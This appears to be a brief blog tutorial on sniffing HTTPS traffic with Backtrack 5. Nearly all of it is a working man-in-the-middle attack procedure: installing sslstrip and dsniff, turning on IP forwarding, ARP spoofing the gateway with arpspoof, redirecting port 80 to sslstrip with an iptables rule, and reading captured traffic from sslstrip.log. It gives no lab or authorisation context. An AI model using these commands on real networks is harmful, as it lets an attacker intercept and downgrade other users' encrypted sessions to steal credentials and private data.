How to sniff HTTPS traffic with Backtrack

OS: Linux Backtrack 5 (Ubuntu):
Install sslstrip with “sudo apt-get install sslstrip”
Install IPtables with “sudo apt-get install iptables”
Install ARPspoof with “sudo apt-get install dsniff”

1 Set your Linux computer into routing mode
echo ‘1’ > /proc/sys/net/ipv4/ip_forward

2 Find the gateway.
netstat -nr

3 Use ARP spoof to perform Man In The Middle attack
arpspoof -i [NIC-interface] [gateway]
Example: arpspoof -i eth0 192.168.1.22

4 Set a firewall rule to redirect requests from port 80 to port 8080 (Port 80 -> 8080 = sslstrip)
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

5 Launch sslstrip
cd /pentest/web/sslstrip/
chmod +x sslstrip.py
./sslstrip.py -l 8080

6 Man In The Middle attack is running. See sslstrip.log for traffic data

Geef als eerste een reactie

Geef een reactie

Uw e-mailadres wordt niet gepubliceerd.


*